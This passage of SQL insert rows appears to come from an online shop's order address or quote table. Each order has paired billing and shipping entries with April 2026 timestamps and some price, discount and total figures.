(1655, 1011, '2026-04-12 19:21:36', '2026-04-12 19:21:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1656, 1011, '2026-04-12 19:21:36', '2026-04-12 19:22:21', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 966.0000, 966.0000, 772.8000, 772.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -193.2000, -193.2000, 772.8000, 772.8000, NULL, '[]', NULL, 0.0000, 0.0000, 966.0000, 966.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1657, 1012, '2026-04-12 19:21:44', '2026-04-12 19:21:44', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1658, 1012, '2026-04-12 19:21:44', '2026-04-12 19:21:44', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1659, 1013, '2026-04-12 19:21:45', '2026-04-12 19:21:45', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1660, 1013, '2026-04-12 19:21:45', '2026-04-12 19:21:45', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1661, 1014, '2026-04-12 19:21:46', '2026-04-12 19:21:46', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1662, 1014, '2026-04-12 19:21:46', '2026-04-12 19:21:46', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1663, 1015, '2026-04-12 19:21:48', '2026-04-12 19:21:48', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1664, 1015, '2026-04-12 19:21:48', '2026-04-12 19:21:48', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1665, 1016, '2026-04-12 19:21:49', '2026-04-12 19:21:49', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1666, 1016, '2026-04-12 19:21:49', '2026-04-12 19:21:49', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1667, 1017, '2026-04-12 19:21:50', '2026-04-12 19:21:50', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1668, 1017, '2026-04-12 19:21:50', '2026-04-12 19:21:50', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1669, 1018, '2026-04-12 19:42:24', '2026-04-12 19:42:24', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1670, 1018, '2026-04-12 19:42:24', '2026-04-12 19:42:24', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1671, 1019, '2026-04-12 22:39:35', '2026-04-12 22:39:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1672, 1019, '2026-04-12 22:39:35', '2026-04-12 22:39:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1673, 1020, '2026-04-13 04:33:26', '2026-04-13 04:33:26', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1674, 1020, '2026-04-13 04:33:26', '2026-04-13 04:33:26', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1675, 1021, '2026-04-13 04:52:43', '2026-04-13 04:52:43', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1676, 1021, '2026-04-13 04:52:43', '2026-04-13 04:52:43', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1677, 1022, '2026-04-13 06:52:20', '2026-04-13 06:52:20', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1678, 1022, '2026-04-13 06:52:20', '2026-04-13 06:52:20', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1679, 1023, '2026-04-13 08:56:28', '2026-04-13 08:56:28', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1680, 1023, '2026-04-13 08:56:28', '2026-04-13 08:56:28', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1681, 1024, '2026-04-13 13:22:05', '2026-04-13 13:22:05', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1682, 1024, '2026-04-13 13:22:05', '2026-04-13 13:22:05', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1683, 1025, '2026-04-13 14:06:21', '2026-04-13 14:06:21', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1684, 1025, '2026-04-13 14:06:21', '2026-04-13 14:06:21', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1685, 1026, '2026-04-13 15:11:11', '2026-04-13 15:11:11', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1686, 1026, '2026-04-13 15:11:11', '2026-04-13 15:11:11', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1687, 1027, '2026-04-13 15:11:48', '2026-04-13 15:11:48', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1688, 1027, '2026-04-13 15:11:48', '2026-04-13 15:11:48', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1689, 1028, '2026-04-13 18:19:01', '2026-04-13 18:19:01', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1690, 1028, '2026-04-13 18:19:01', '2026-04-13 18:19:01', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1691, 1029, '2026-04-13 18:41:49', '2026-04-13 18:41:49', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1692, 1029, '2026-04-13 18:41:49', '2026-04-13 18:41:49', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1693, 1030, '2026-04-13 23:18:31', '2026-04-13 23:18:31', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1694, 1030, '2026-04-13 23:18:31', '2026-04-13 23:18:31', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1695, 1031, '2026-04-13 23:19:20', '2026-04-13 23:19:20', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1696, 1031, '2026-04-13 23:19:20', '2026-04-13 23:19:20', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1697, 1032, '2026-04-14 06:27:04', '2026-04-14 06:27:04', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1698, 1032, '2026-04-14 06:27:04', '2026-04-14 06:27:04', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1699, 1033, '2026-04-14 07:31:16', '2026-04-14 07:31:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1700, 1033, '2026-04-14 07:31:16', '2026-04-14 07:31:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
